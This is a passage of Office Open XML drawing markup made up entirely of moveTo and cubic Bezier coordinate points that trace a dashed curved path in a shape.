                  <a:cubicBezTo>
                    <a:pt x="2104" y="836"/>
                    <a:pt x="2106" y="843"/>
                    <a:pt x="2107" y="849"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2108" y="851"/>
                    <a:pt x="2110" y="853"/>
                    <a:pt x="2112" y="852"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="852"/>
                    <a:pt x="2116" y="850"/>
                    <a:pt x="2115" y="847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="841"/>
                    <a:pt x="2112" y="834"/>
                    <a:pt x="2111" y="828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="826"/>
                    <a:pt x="2108" y="824"/>
                    <a:pt x="2106" y="825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="825"/>
                    <a:pt x="2102" y="827"/>
                    <a:pt x="2103" y="830"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="791"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="797"/>
                    <a:pt x="2097" y="804"/>
                    <a:pt x="2098" y="810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2099" y="812"/>
                    <a:pt x="2101" y="814"/>
                    <a:pt x="2103" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2105" y="813"/>
                    <a:pt x="2107" y="810"/>
                    <a:pt x="2106" y="808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="802"/>
                    <a:pt x="2103" y="795"/>
                    <a:pt x="2101" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100" y="787"/>
                    <a:pt x="2098" y="785"/>
                    <a:pt x="2096" y="786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="787"/>
                    <a:pt x="2093" y="789"/>
                    <a:pt x="2093" y="791"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="753"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2084" y="759"/>
                    <a:pt x="2086" y="765"/>
                    <a:pt x="2088" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2089" y="774"/>
                    <a:pt x="2091" y="775"/>
                    <a:pt x="2093" y="774"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2095" y="774"/>
                    <a:pt x="2096" y="772"/>
                    <a:pt x="2096" y="769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="763"/>
                    <a:pt x="2092" y="757"/>
                    <a:pt x="2090" y="750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2089" y="748"/>
                    <a:pt x="2087" y="747"/>
                    <a:pt x="2085" y="748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="748"/>
                    <a:pt x="2081" y="751"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="753"/>
                    <a:pt x="2082" y="753"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2070" y="715"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2072" y="721"/>
                    <a:pt x="2074" y="727"/>
                    <a:pt x="2076" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2077" y="736"/>
                    <a:pt x="2079" y="737"/>
                    <a:pt x="2081" y="736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="735"/>
                    <a:pt x="2084" y="733"/>
                    <a:pt x="2084" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="725"/>
                    <a:pt x="2079" y="718"/>
                    <a:pt x="2077" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="710"/>
                    <a:pt x="2074" y="709"/>
                    <a:pt x="2072" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="710"/>
                    <a:pt x="2069" y="713"/>
                    <a:pt x="2070" y="715"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2056" y="677"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="684"/>
                    <a:pt x="2060" y="690"/>
                    <a:pt x="2063" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2063" y="698"/>
                    <a:pt x="2066" y="699"/>
                    <a:pt x="2068" y="698"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2070" y="698"/>
                    <a:pt x="2071" y="695"/>
                    <a:pt x="2070" y="693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="687"/>
                    <a:pt x="2065" y="681"/>
                    <a:pt x="2063" y="674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="672"/>
                    <a:pt x="2060" y="671"/>
                    <a:pt x="2058" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2056" y="673"/>
                    <a:pt x="2055" y="675"/>
                    <a:pt x="2056" y="677"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="641"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2043" y="647"/>
                    <a:pt x="2045" y="653"/>
                    <a:pt x="2048" y="659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2049" y="661"/>
                    <a:pt x="2051" y="662"/>
                    <a:pt x="2053" y="661"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="660"/>
                    <a:pt x="2056" y="658"/>
                    <a:pt x="2055" y="656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="650"/>
                    <a:pt x="2050" y="644"/>
                    <a:pt x="2047" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2047" y="635"/>
                    <a:pt x="2044" y="635"/>
                    <a:pt x="2042" y="635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="636"/>
                    <a:pt x="2039" y="639"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2026" y="611"/>
                    <a:pt x="2029" y="617"/>
                    <a:pt x="2032" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2033" y="625"/>
                    <a:pt x="2035" y="626"/>
                    <a:pt x="2037" y="625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2039" y="624"/>
                    <a:pt x="2040" y="621"/>
                    <a:pt x="2039" y="619"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="613"/>
                    <a:pt x="2034" y="607"/>
                    <a:pt x="2031" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2030" y="599"/>
                    <a:pt x="2027" y="598"/>
                    <a:pt x="2025" y="599"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="600"/>
                    <a:pt x="2022" y="603"/>
                    <a:pt x="2023" y="605"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="569"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2008" y="575"/>
                    <a:pt x="2012" y="581"/>
                    <a:pt x="2015" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2016" y="589"/>
                    <a:pt x="2018" y="590"/>
                    <a:pt x="2020" y="589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="588"/>
                    <a:pt x="2023" y="585"/>
                    <a:pt x="2022" y="583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2019" y="577"/>
                    <a:pt x="2016" y="571"/>
                    <a:pt x="2012" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2011" y="564"/>
                    <a:pt x="2009" y="563"/>
                    <a:pt x="2007" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="565"/>
                    <a:pt x="2004" y="567"/>
                    <a:pt x="2005" y="569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="569"/>
                    <a:pt x="2005" y="569"/>
                    <a:pt x="2005" y="569"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="534"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="540"/>
                    <a:pt x="1993" y="546"/>
                    <a:pt x="1996" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1997" y="554"/>
                    <a:pt x="1999" y="554"/>
                    <a:pt x="2001" y="553"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2003" y="552"/>
                    <a:pt x="2004" y="550"/>
                    <a:pt x="2003" y="548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="542"/>
                    <a:pt x="1996" y="536"/>
                    <a:pt x="1993" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1992" y="529"/>
                    <a:pt x="1989" y="528"/>
                    <a:pt x="1987" y="529"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1985" y="530"/>
                    <a:pt x="1985" y="533"/>
                    <a:pt x="1986" y="534"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="500"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1969" y="506"/>
                    <a:pt x="1972" y="512"/>
                    <a:pt x="1976" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1977" y="519"/>
                    <a:pt x="1979" y="520"/>
                    <a:pt x="1981" y="519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1983" y="518"/>
                    <a:pt x="1984" y="515"/>
                    <a:pt x="1983" y="513"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="508"/>
                    <a:pt x="1976" y="502"/>
                    <a:pt x="1972" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1971" y="494"/>
                    <a:pt x="1968" y="494"/>
                    <a:pt x="1966" y="495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="496"/>
                    <a:pt x="1964" y="499"/>
                    <a:pt x="1965" y="500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="500"/>
                    <a:pt x="1965" y="500"/>
                    <a:pt x="1965" y="500"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="467"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="473"/>
                    <a:pt x="1951" y="478"/>
                    <a:pt x="1954" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1956" y="486"/>
                    <a:pt x="1958" y="486"/>
                    <a:pt x="1960" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1962" y="484"/>
                    <a:pt x="1962" y="481"/>
                    <a:pt x="1961" y="479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="474"/>
                    <a:pt x="1954" y="468"/>
                    <a:pt x="1950" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1949" y="461"/>
                    <a:pt x="1946" y="460"/>
                    <a:pt x="1944" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="463"/>
                    <a:pt x="1942" y="465"/>
                    <a:pt x="1943" y="467"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="435"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="440"/>
                    <a:pt x="1928" y="446"/>
                    <a:pt x="1932" y="451"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1933" y="453"/>
                    <a:pt x="1936" y="453"/>
                    <a:pt x="1937" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="451"/>
                    <a:pt x="1940" y="448"/>
                    <a:pt x="1938" y="446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="441"/>
                    <a:pt x="1930" y="435"/>
                    <a:pt x="1926" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1925" y="428"/>
                    <a:pt x="1923" y="428"/>
                    <a:pt x="1921" y="429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1919" y="431"/>
                    <a:pt x="1919" y="433"/>
                    <a:pt x="1920" y="435"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1920" y="435"/>
                    <a:pt x="1920" y="435"/>
                    <a:pt x="1920" y="435"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1896" y="403"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="409"/>
                    <a:pt x="1904" y="414"/>
                    <a:pt x="1908" y="419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1909" y="421"/>
                    <a:pt x="1912" y="421"/>
                    <a:pt x="1914" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1915" y="418"/>
                    <a:pt x="1916" y="416"/>
                    <a:pt x="1914" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="409"/>
                    <a:pt x="1906" y="404"/>
                    <a:pt x="1902" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="397"/>
                    <a:pt x="1898" y="396"/>
                    <a:pt x="1896" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1894" y="399"/>
                    <a:pt x="1894" y="402"/>
                    <a:pt x="1896" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1896" y="403"/>
                    <a:pt x="1896" y="403"/>
                    <a:pt x="1896" y="403"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="378"/>
                    <a:pt x="1879" y="383"/>
                    <a:pt x="1883" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="390"/>
                    <a:pt x="1887" y="390"/>
                    <a:pt x="1889" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1890" y="387"/>
                    <a:pt x="1890" y="385"/>
                    <a:pt x="1889" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1885" y="378"/>
                    <a:pt x="1880" y="373"/>
                    <a:pt x="1876" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1875" y="366"/>
                    <a:pt x="1872" y="366"/>
                    <a:pt x="1870" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1869" y="369"/>
                    <a:pt x="1868" y="371"/>
                    <a:pt x="1870" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1870" y="373"/>
                    <a:pt x="1870" y="373"/>
                    <a:pt x="1870" y="373"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="343"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1848" y="348"/>
                    <a:pt x="1852" y="353"/>
                    <a:pt x="1857" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="360"/>
                    <a:pt x="1861" y="360"/>
                    <a:pt x="1862" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1864" y="357"/>
                    <a:pt x="1864" y="354"/>
                    <a:pt x="1863" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="348"/>
                    <a:pt x="1854" y="343"/>
                    <a:pt x="1849" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1848" y="336"/>
                    <a:pt x="1845" y="336"/>
                    <a:pt x="1843" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1842" y="339"/>
                    <a:pt x="1842" y="342"/>
                    <a:pt x="1843" y="343"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="315"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1820" y="319"/>
                    <a:pt x="1825" y="324"/>
                    <a:pt x="1829" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="330"/>
                    <a:pt x="1833" y="330"/>
                    <a:pt x="1835" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837" y="327"/>
                    <a:pt x="1837" y="325"/>
                    <a:pt x="1835" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="318"/>
                    <a:pt x="1826" y="314"/>
                    <a:pt x="1821" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="307"/>
                    <a:pt x="1817" y="307"/>
                    <a:pt x="1815" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1814" y="311"/>
                    <a:pt x="1814" y="313"/>
                    <a:pt x="1815" y="315"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="287"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1791" y="292"/>
                    <a:pt x="1796" y="296"/>
                    <a:pt x="1801" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1803" y="302"/>
                    <a:pt x="1805" y="302"/>
                    <a:pt x="1807" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="299"/>
                    <a:pt x="1808" y="296"/>
                    <a:pt x="1807" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="290"/>
                    <a:pt x="1797" y="286"/>
                    <a:pt x="1792" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="280"/>
                    <a:pt x="1788" y="280"/>
                    <a:pt x="1786" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1785" y="283"/>
                    <a:pt x="1785" y="286"/>
                    <a:pt x="1786" y="287"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1757" y="261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1762" y="265"/>
                    <a:pt x="1767" y="269"/>
                    <a:pt x="1772" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1773" y="275"/>
                    <a:pt x="1776" y="275"/>
                    <a:pt x="1777" y="273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1779" y="272"/>
                    <a:pt x="1779" y="269"/>
                    <a:pt x="1777" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="263"/>
                    <a:pt x="1767" y="259"/>
                    <a:pt x="1762" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="253"/>
                    <a:pt x="1758" y="253"/>
                    <a:pt x="1756" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1755" y="257"/>
                    <a:pt x="1755" y="259"/>
                    <a:pt x="1757" y="261"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1726" y="235"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1731" y="240"/>
                    <a:pt x="1736" y="244"/>
                    <a:pt x="1741" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1743" y="249"/>
                    <a:pt x="1746" y="249"/>
                    <a:pt x="1747" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1748" y="246"/>
                    <a:pt x="1748" y="243"/>
                    <a:pt x="1746" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1741" y="237"/>
                    <a:pt x="1736" y="233"/>
                    <a:pt x="1731" y="229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1729" y="228"/>
                    <a:pt x="1726" y="228"/>
                    <a:pt x="1725" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1724" y="231"/>
                    <a:pt x="1724" y="234"/>
                    <a:pt x="1726" y="235"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1694" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1699" y="215"/>
                    <a:pt x="1705" y="219"/>
                    <a:pt x="1710" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1712" y="224"/>
                    <a:pt x="1714" y="224"/>
                    <a:pt x="1716" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1717" y="221"/>
                    <a:pt x="1717" y="218"/>
                    <a:pt x="1715" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1709" y="213"/>
                    <a:pt x="1704" y="209"/>
                    <a:pt x="1699" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1697" y="203"/>
                    <a:pt x="1694" y="204"/>
                    <a:pt x="1693" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1692" y="207"/>
                    <a:pt x="1692" y="210"/>
                    <a:pt x="1694" y="211"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="188"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="192"/>
                    <a:pt x="1672" y="196"/>
                    <a:pt x="1678" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1679" y="201"/>
                    <a:pt x="1682" y="200"/>
                    <a:pt x="1683" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1685" y="197"/>
                    <a:pt x="1684" y="194"/>
                    <a:pt x="1682" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1677" y="189"/>
                    <a:pt x="1671" y="185"/>
                    <a:pt x="1666" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1664" y="180"/>
                    <a:pt x="1661" y="181"/>
                    <a:pt x="1660" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1659" y="185"/>
                    <a:pt x="1659" y="187"/>
                    <a:pt x="1661" y="188"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1628" y="167"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1633" y="170"/>
                    <a:pt x="1639" y="174"/>
                    <a:pt x="1645" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1646" y="178"/>
                    <a:pt x="1649" y="178"/>
                    <a:pt x="1650" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1651" y="174"/>
                    <a:pt x="1651" y="172"/>
                    <a:pt x="1649" y="171"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="167"/>
                    <a:pt x="1638" y="163"/>
                    <a:pt x="1632" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1630" y="159"/>
                    <a:pt x="1628" y="159"/>
                    <a:pt x="1626" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1625" y="163"/>
                    <a:pt x="1626" y="165"/>
                    <a:pt x="1628" y="167"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1628" y="167"/>
                    <a:pt x="1628" y="167"/>
                    <a:pt x="1628" y="167"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1593" y="146"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="149"/>
                    <a:pt x="1605" y="153"/>
                    <a:pt x="1611" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1612" y="157"/>
                    <a:pt x="1615" y="157"/>
                    <a:pt x="1616" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="153"/>
                    <a:pt x="1617" y="150"/>
                    <a:pt x="1615" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1609" y="146"/>
                    <a:pt x="1603" y="143"/>
                    <a:pt x="1597" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1595" y="138"/>
                    <a:pt x="1593" y="139"/>
                    <a:pt x="1592" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1591" y="143"/>
                    <a:pt x="1591" y="145"/>
                    <a:pt x="1593" y="146"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1558" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1564" y="130"/>
                    <a:pt x="1570" y="133"/>
                    <a:pt x="1576" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1578" y="138"/>
                    <a:pt x="1580" y="137"/>
                    <a:pt x="1581" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1582" y="133"/>
                    <a:pt x="1582" y="130"/>
                    <a:pt x="1580" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574" y="126"/>
                    <a:pt x="1568" y="123"/>
                    <a:pt x="1562" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1560" y="119"/>
                    <a:pt x="1558" y="120"/>
                    <a:pt x="1556" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1555" y="124"/>
                    <a:pt x="1556" y="126"/>
                    <a:pt x="1558" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1558" y="127"/>
                    <a:pt x="1558" y="127"/>
                    <a:pt x="1558" y="127"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1522" y="109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="112"/>
                    <a:pt x="1534" y="115"/>
                    <a:pt x="1540" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1542" y="119"/>
                    <a:pt x="1545" y="118"/>
                    <a:pt x="1546" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1547" y="114"/>
                    <a:pt x="1546" y="112"/>
                    <a:pt x="1544" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1538" y="108"/>
                    <a:pt x="1532" y="105"/>
                    <a:pt x="1526" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1524" y="101"/>
                    <a:pt x="1521" y="102"/>
                    <a:pt x="1520" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1520" y="106"/>
                    <a:pt x="1520" y="108"/>
                    <a:pt x="1522" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1522" y="109"/>
                    <a:pt x="1522" y="109"/>
                    <a:pt x="1522" y="109"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1486" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1492" y="95"/>
                    <a:pt x="1498" y="98"/>
                    <a:pt x="1504" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1506" y="102"/>
                    <a:pt x="1509" y="101"/>
                    <a:pt x="1509" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1510" y="97"/>
                    <a:pt x="1509" y="94"/>
                    <a:pt x="1507" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1501" y="91"/>
                    <a:pt x="1495" y="88"/>
                    <a:pt x="1489" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1487" y="85"/>
                    <a:pt x="1485" y="86"/>
                    <a:pt x="1484" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1483" y="90"/>
